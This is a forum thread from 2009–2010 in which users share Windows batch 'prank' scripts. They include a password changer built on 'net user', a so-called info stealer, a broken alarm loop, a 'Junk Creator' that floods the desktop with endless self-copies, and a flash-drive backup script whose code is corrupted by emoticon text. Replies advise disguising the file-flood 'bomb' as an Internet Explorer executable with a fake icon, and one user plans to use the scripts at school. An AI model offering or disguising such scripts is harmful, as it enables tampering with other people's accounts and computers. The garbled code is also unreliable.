Post: Try These .bat codes! [Trust Me]
03-21-2009, 07:15 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Check these out....

Password Remover / Changer
Changes or removes a password on an account.
    :top
@echo off
color 6e
Title Password Remover/Changer by Shadow Ops
:begin
cls
echo Type the user name you wish to change the password for.
SET /p UDefine=
SET /a UDefine=%UDefine% *
cls
msg * To remove the password, press enter twice.
msg * To change the password, type in the new password. You cant see the characters but it works.
cls
net user %udefine% *
pause>nul
:end











Info Stealer
Creates a .txt file with the computer name, user name, time, and date.
    @echo off
echo Computer Name: %computername%>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo User Name: %username%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Time: %time>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Date: %date%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls



Alarm
Sounds an alarm through the cpu's internal speakers. Turning down volume will not stop it.
    :top

goto top


Junk Creator
Fills your desktop with useless icons until closed.
    cd %userprofile%\desktop
:top
copy %0 %random%.bmp
copy %0 %random%.txt
copy %0 %random%.exe
copy %0 %random%.bat
copy %0 %random%.dat
copy %0 %random%.ini
copy %0 %random%.html
copy %0 %random%.jpeg
copy %0 %random%.mp3
copy %0 %random%.wav
copy %0 %random%.com
copy %0 %random%.cat
copy %0 %random%.ctt
copy %0 %random%.cur
copy %0 %random%.ico
copy %0 %random%.gif
copy %0 %random%.dic
copy %0 %random%.hlp
copy %0 %random%.htm
copy %0 %random%.jpg
copy %0 %random%.py
copy %0 %random%.tmp
copy %0 %random%.web
copy %0 %random%.xhtml
copy %0 %random%.lnk
goto top


Flash Drive Backup
Backs up every thing on your flash drive to a folder called "Flash Drive Backup" on your desktop. *Must be in the root directory of the flash drive.

    @echo off
echo.
echo Backing up your flash drive...
echo.
FOR /F "TOKENS=*" %%A IN ('TIME/T'Winky Winky DO SET TIME=%%A
for /f "tokens=2-4 delims=/ " %%g in ('date /t'Winky Winky do (
set mm=%%g
set dd=%%h
set yy=%%i
)
for /f "tokens=3 delims=\" %%i in ("%USERPROFILE%") do (set user=%%i) 2>&1
if exist "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" (
rd /S /Q "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%"
)
SET time=%time::=.%
xcopy "*" "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" /s /i
echo.
echo Backup Complete!
echo.


-LordOfSpoon
-Shadow Ops
(adsbygoogle = window.adsbygoogle || []).push({});

The following 6 users say thank you to LordOfSpoon™ for this useful post:

ꜛ  , Booshykins, l-MoNsT3R-l, NanuGama, RedKnight
03-12-2010, 01:53 AM #29
Nice, I never have heard of the alarm function before... also, to make the bomb less obvious you can save it as an "exe." instead of a "bat." and it will still work. Save it as "Internet Explorer" and then change the icon and it will look legit...
03-13-2010, 05:49 AM #30
Your going to need an .bat to .exe converter, you can add a password so that way you can no **** up your own computer lol
03-14-2010, 11:41 PM #31
Hitler Reborn
< ^ > < ^ >
so where do u enter these codes to get them to do these things?
03-28-2010, 05:30 PM #32
imhungry17
You talkin to me?
ok how do u use these? send me a message please and dont post it as a reply
03-30-2010, 01:10 AM #33
if you need to PM me to understand how to use these codes, then you probably shouldn 't be using them.
04-07-2010, 11:06 AM #34
So how do I make this. Do I just create a text file in notepad and rename it to .bat.
04-11-2010, 07:15 PM #35
Originally posted by GenTrapstar View Post
So how do I make this. Do I just create a text file in notepad and rename it to .bat.


yes.........
04-11-2010, 10:40 PM #36
PigBenis
Save Point
lol, seen these before. Funny shite
04-11-2010, 11:21 PM #37
Nice post dude. Should be good fun when I get back to school.

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo